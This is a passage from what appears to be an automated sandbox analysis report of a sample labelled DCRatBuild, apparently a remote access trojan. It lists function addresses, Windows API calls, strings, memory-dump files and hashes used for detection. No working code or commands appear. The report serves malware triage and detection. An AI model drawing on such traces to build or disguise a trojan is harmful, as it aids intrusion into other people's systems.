Instruction Fuzzy Hash: 2AA011C22A8882BC3008B280AC02C3F220CE2C2F20330882EF88A88082AC800C000A30

Function 0008E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E580

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b80a6a885c1fa2bc184dc291b4d8b4b40f313dfccc48f82368559f6bc21c7844
Instruction ID: 770b82b451a7ecdb64caf174ebc6d2d2b5de1cf95961cfe9136b306325a938dc
Opcode Fuzzy Hash: b80a6a885c1fa2bc184dc291b4d8b4b40f313dfccc48f82368559f6bc21c7844
Instruction Fuzzy Hash: F1A011C22A8080BC3008B2A0AC02C3F020CE2C2B22332822EF88888082AC8008000A30

Function 0008E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E580

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 58597d25341d30115bdb396373a6e84d9151d018072aa1fa9143e69b1da25fb5
Instruction ID: a4575e33a4c36460a996eb05bce87de3569277f897e95533d25cafc2a3e7dbb3
Opcode Fuzzy Hash: 58597d25341d30115bdb396373a6e84d9151d018072aa1fa9143e69b1da25fb5
Instruction Fuzzy Hash: 76A011C22A8082BC3008B2A0AC02C3F020CE2C2B20332882EF88A88082AC8008000A30

Function 0008E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E580

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7ac1892e7960f5b5713bc7ba6b8b6cb9d33f1581c3ca23fedfa5dcdb8a7c7ca3
Instruction ID: a4575e33a4c36460a996eb05bce87de3569277f897e95533d25cafc2a3e7dbb3
Opcode Fuzzy Hash: 7ac1892e7960f5b5713bc7ba6b8b6cb9d33f1581c3ca23fedfa5dcdb8a7c7ca3
Instruction Fuzzy Hash: 76A011C22A8082BC3008B2A0AC02C3F020CE2C2B20332882EF88A88082AC8008000A30

Function 00079F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0007903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00079F0C

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: fd6148d8047fd4d778b7afe23c4049555f9a4091506c9834bfb3f64db2b88ee8
Instruction ID: 8b71eadbc7fc9a2084f5b44887feab2ab45c27e2f78f59e1cecb9be6addd6ac3
Opcode Fuzzy Hash: fd6148d8047fd4d778b7afe23c4049555f9a4091506c9834bfb3f64db2b88ee8
Instruction Fuzzy Hash: 97A0243004040D47DD001730CD1440C7710F7117C030041D47007CF071C7174407CF00

Function 0008AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0008AE72,C:\Users\user\AppData\Local\Temp,00000000,000B946A,00000006), ref: 0008AC08

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 3668da82e8888cf1ecef30cab2dc8b87b759100e7dc3164705b986d04c6f077b
Instruction ID: 5467da14d1e89da407758e81a995cdea1cb24fded87e2f6a29c5b79baec9c768
Opcode Fuzzy Hash: 3668da82e8888cf1ecef30cab2dc8b87b759100e7dc3164705b986d04c6f077b
Instruction Fuzzy Hash: ECA011302002008BA2000B328F0AA0EBAAAAFA2B00F00C028B00088030CB38C820BA00

Function 00079620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,000795D6,?,?,?,?,?,000A2641,000000FF), ref: 0007963B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2325ff7341730f0a1b1daf045a42c0861db8c0eb7bc0e738dbf1d2c0f85fa682
Instruction ID: 99653350f039de6fb111db5c4d12a41035c655e610ace018b0b68a75838d4e64
Opcode Fuzzy Hash: 2325ff7341730f0a1b1daf045a42c0861db8c0eb7bc0e738dbf1d2c0f85fa682
Instruction Fuzzy Hash: 11F08270885B559FDB308A24C458B92B7E8AB12321F149B5ED0EB429F0D769AA8D8A44

Non-executed Functions

Function 0008C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00071316: GetDlgItem.USER32(00000000,00003021), ref: 0007135A
Part of subcall function 00071316: SetWindowTextW.USER32(00000000,000A35F4), ref: 00071370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0008C2B1
EndDialog.USER32(?,00000006), ref: 0008C2C4
GetDlgItem.USER32(?,0000006C), ref: 0008C2E0
SetFocus.USER32(00000000), ref: 0008C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0008C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0008C358
FindFirstFileW.KERNEL32(?,?), ref: 0008C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0008C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0008C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0008C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0008C3D4
_swprintf.LIBCMT ref: 0008C404

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0008C417
FindClose.KERNEL32(00000000), ref: 0008C41E
_swprintf.LIBCMT ref: 0008C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0008C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0008C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0008C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0008C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0008C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0008C509
_swprintf.LIBCMT ref: 0008C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0008C548
_swprintf.LIBCMT ref: 0008C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0008C5AF

Part of subcall function 0008AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0008AF35
Part of subcall function 0008AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,000AE72C,?,?), ref: 0008AF84

Strings

%s %s %s, xrefs: 0008C3F2, 0008C527
%s %s, xrefs: 0008C469, 0008C58E
REPLACEFILEDLG, xrefs: 0008C247

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 4f150bb72b6fcc15de557f9aaa2984659bb332d2af0926d000e90a117ba9e429
Instruction ID: a8f184f43bde189f1710725b44b34ed35d89467d1e7c8ecab315fa544f590869
Opcode Fuzzy Hash: 4f150bb72b6fcc15de557f9aaa2984659bb332d2af0926d000e90a117ba9e429
Instruction Fuzzy Hash: 97917572544348BBF261ABA0DC49FFB77ECFB4A700F044819B789D6081D775AA058772

Function 00076FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00076FAA
_wcslen.LIBCMT ref: 00077013
_wcslen.LIBCMT ref: 00077084

Part of subcall function 00077A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00077AAB
Part of subcall function 00077A9C: GetLastError.KERNEL32 ref: 00077AF1
Part of subcall function 00077A9C: CloseHandle.KERNEL32(?), ref: 00077B00

Part of subcall function 0007A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0007977F,?,?,000795CF,?,?,?,?,?,000A2641,000000FF), ref: 0007A1F1
Part of subcall function 0007A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0007977F,?,?,000795CF,?,?,?,?,?,000A2641), ref: 0007A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00077139
CloseHandle.KERNEL32(00000000), ref: 00077155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00077298

Part of subcall function 00079DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000773BC,?,?,?,00000000), ref: 00079DBC
Part of subcall function 00079DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00079E70

Part of subcall function 00079620: CloseHandle.KERNELBASE(000000FF,?,?,000795D6,?,?,?,?,?,000A2641,000000FF), ref: 0007963B

Part of subcall function 0007A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0007A325,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A501
Part of subcall function 0007A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0007A325,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A532

Strings

SeRestorePrivilege, xrefs: 00076FC2
UNC\, xrefs: 00077051
SeCreateSymbolicLinkPrivilege, xrefs: 00076FCC
\??\, xrefs: 0007702B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: f9c9df31d93dd590999551a92b0c82586b54a9a44c347bdf456875ed0e34c4e6
Instruction ID: 08d27ba6889c5b323eb44418f75cc8e6a60a5c375f8f2dbd6ea379fd461dedd6
Opcode Fuzzy Hash: f9c9df31d93dd590999551a92b0c82586b54a9a44c347bdf456875ed0e34c4e6
Instruction Fuzzy Hash: D9C1F571E04604AAEB21EB74CC81FEEB3A8AF45340F008559F95EE7183D778AB44CB65

Function 0009D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0009DA34

Strings

1#SNAN, xrefs: 0009EC33
1#QNAN, xrefs: 0009EC3A
1#INF, xrefs: 0009EC41
1#IND, xrefs: 0009EC2C

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 343ad9fd6b79673d25599550d98f0c35a202aa746a4408d126c4b9ba21b6fafc
Instruction ID: 69ce6a04b297dcc010244023da903b552ef3e62c747d1ed4cca244dfef9d14b4
Opcode Fuzzy Hash: 343ad9fd6b79673d25599550d98f0c35a202aa746a4408d126c4b9ba21b6fafc
Instruction Fuzzy Hash: 79C23672E086688FDF65CE28DD407EAB7B5EB84305F1441EAD84EE7241E774AE819F40

Function 000732F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00073300
_swprintf.LIBCMT ref: 000736C7

Strings

CMT, xrefs: 00073A17
h%u, xrefs: 000736BC
hc%u, xrefs: 0007370A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 8b310e70721d7b6c2a30e4d9a9ea084e29dc45d9c02d230b77421e0cdc789623
Instruction ID: 145082879f198c6661a0d568812bbc64c88dcf0fcefa9eba1fead7faea084e8b
Opcode Fuzzy Hash: 8b310e70721d7b6c2a30e4d9a9ea084e29dc45d9c02d230b77421e0cdc789623
Instruction Fuzzy Hash: 0232C671914384ABEB18DF74C895AEA37D5AF15300F04847DFD8E8B283DB78A649CB64

Function 0007286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00072874
_strlen.LIBCMT ref: 00072E3F

Part of subcall function 000802BA: __EH_prolog.LIBCMT ref: 000802BF

Part of subcall function 00081B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0007BAE9,00000000,?,?,?,000103F6), ref: 00081BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00072F91

Strings

CMT, xrefs: 00072FBC

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 4ef9b31d845c295033d5407ce293150e3a61cb85c457345e6a5f7ce049f56c06
Instruction ID: 873ad58a98c7ba5084276a62fa72940e046887e2e13ec91039b30b170f1b43d0
Opcode Fuzzy Hash: 4ef9b31d845c295033d5407ce293150e3a61cb85c457345e6a5f7ce049f56c06
Instruction Fuzzy Hash: 0762F571A002458FDB29DF34C895AEA37E1AF54300F08C57EED9E8B283DB799945CB64

Function 0009D440 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Strings

[, xrefs: 0009D45D, 0009D608, 0009D82C, 0009D7C6, 0009D656, 0009D5E4
[, xrefs: 0009D8A8, 0009D692, 0009D521

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID: [$[
API String ID: 0-34606449
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 994b67c26bf25946760e3300ea149b9be42a0ba42624caddc7d31bf5ad03604c
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 70022C71E402199FDF14CFA9C9806AEF7F1EF48314F25826AD919E7281E730A9419B90

Function 0008F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0008F844
IsDebuggerPresent.KERNEL32 ref: 0008F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0008F930
UnhandledExceptionFilter.KERNEL32(?), ref: 0008F93A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ea787de30b9883ff69ffe2c8d5c1e1e4ca11111d4e055dea01c8856bfde93cb7
Instruction ID: 47ca262bcff5731dc019167c914de1d201b38396b306bddec1656145d34a5276
Opcode Fuzzy Hash: ea787de30b9883ff69ffe2c8d5c1e1e4ca11111d4e055dea01c8856bfde93cb7
Instruction Fuzzy Hash: 4A313875D45219DBDB21EFA4D9897CCBBB8BF08300F1040EAE44CAB251EB759B848F05

Function 0008E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,0008E5E8,0000001C,0008E7DD,00000000,?,?,?,?,?,?,?,0008E5E8,00000004,000D1CEC,0008E86D), ref: 0008E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0008E5E8,00000004,000D1CEC,0008E86D), ref: 0008E6CF

Strings

D, xrefs: 0008E6C3

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 7a334bfebc0bc6fedf5fc000915349d72afb148bfa1a0a8fa3105f0a86c2daae
Instruction ID: e7baedce0bd2c4b2fd1746483809ce46b8b27ed915e93f1751eefd3af4589c85
Opcode Fuzzy Hash: 7a334bfebc0bc6fedf5fc000915349d72afb148bfa1a0a8fa3105f0a86c2daae
Instruction Fuzzy Hash: AE01F7326005496BDB14EE29DC09BDD7BEAFFC4324F0CC120ED59D7150E638D9058780

Function 00098EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00098FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00098FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00098FCC

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
